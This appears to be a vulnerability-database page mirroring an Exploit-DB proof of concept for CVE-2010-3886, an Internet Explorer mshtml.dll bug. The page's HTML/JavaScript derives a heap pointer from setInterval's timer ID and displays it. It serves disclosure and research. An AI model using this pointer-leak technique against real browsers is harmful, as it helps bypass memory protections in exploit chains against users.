Lucene search
+L

Microsoft - 'MSHTML.dll' CTIMEOUTEVENTLIST::INSERTINTOTIMEOUTLIST Memory Leak

🗓️ 09 Jul 2010 00:00:00Reported by Ruben SantamartaType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 29 Views

MSHTML.dll CTIMEOUTEVENTLIST::INSERTINTOTIMEOUTLIST Memory Lea

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2010-3886
9 Jul 201000:00
circl
cve
CVE
CVE-2010-3886
8 Oct 201021:00
cve
cvelist
Cvelist
CVE-2010-3886
8 Oct 201021:00
cvelist
nvd
NVD
CVE-2010-3886
8 Oct 201022:00
nvd
openvas
OpenVAS
Microsoft Internet Explorer 'mshtml.dll' Information Disclosure Vulnerability
18 Oct 201000:00
openvas
openvas
OpenVAS
Microsoft Internet Explorer 'mshtml.dll' Information Disclosure Vulnerability
18 Oct 201000:00
openvas
prion
Prion
Design/Logic Flaw
8 Oct 201022:00
prion
<html>
<!--http://reversemode.com/index.php?option=com_content&task=view&id=68&Itemid=1 -->
<!-- mshtml.dll CTimeoutEventList::InsertIntoTimeoutList Timer ID Pointer leak - Rubén Santamarta www.reversemode.com -->

    <head>


        <title>mshtml.dll CTimeoutEventList::InsertIntoTimeoutList Timer ID Pointer leak - Rubén Santamarta www.reversemode.com</title>

        <script type='text/javascript'>
						var i = 1; // counter

            function LeakOrDie() {
            	var t;
							t=setInterval("foo()",2000);
							t-=i;
							document.getElementById('atun').innerHTML = '<b> Pointer leaked:</b> '+'0x'+t.toString(16);
							i++;
            }

	          function foo()
	          {
	          	return;
	          }


        </script>

    </head>

    <body>


	<INPUT TYPE=button VALUE="Press to leak"  ONCLICK="LeakOrDie();">

	<br /><br />

		<div id='atun'>		</div>

   </body>

</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Jul 2010 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 24.3
EPSS0.16499
29